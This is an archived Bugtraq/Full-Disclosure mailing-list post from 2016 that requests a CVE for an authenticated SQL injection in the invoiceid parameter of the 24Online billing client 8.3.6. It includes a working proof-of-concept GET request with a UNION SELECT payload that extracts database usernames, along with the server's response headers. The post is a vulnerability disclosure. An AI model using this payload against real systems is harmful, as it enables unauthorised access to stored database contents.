lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201607031017.u63AHTHM007349@sf01web3.securityfocus.com>
Date: Sun, 3 Jul 2016 10:17:29 GMT
From: rahullraz@...il.com
To: bugtraq@...urityfocus.com
Subject: [FD]CVE ID request : SQL injection in 24Online Client

Software name: 24 online
Version: 8.3.6 build 9.0
Vendor website: http://24onlinebilling.com

Potentially others versions older than this are vulnerable too.

Vulnerability type: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The invoiceid GET parameter on <base url>/24online/webpages/myaccount/usersessionsummary.jsp in not filtered properly and leads to SQL Injection

Authentication Required: Yes 

A non-privileged authenticated user can inject SQL commands on the <base-url>/24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=<numeric-id> &fromdt=dd/mm/yyyy hh:mm:ss&todt= dd/mm/yyyy hh:mm:ss

There is complete informational disclosure over the stored database.

-----------------------------------
GET /24online/webpages/myaccount/usersessionsummary.jsp?invoiceid=93043+UNION+ALL+SELECT+null,null,null,null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pg_user--+-&fromdt=06/05/2016%2019:37:44&todt=03/07/2016%2015:21:16 HTTP/1.1
Host: 10.100.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=5464B4DD2B003E1E73E34FF773CA7232; myaccountmenu_id=menu_5
Connection: keep-alive

HTTP/1.1 200 OK
Date: Sun, 03 Jul 2016 09:59:41 GMT
Server: Apache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ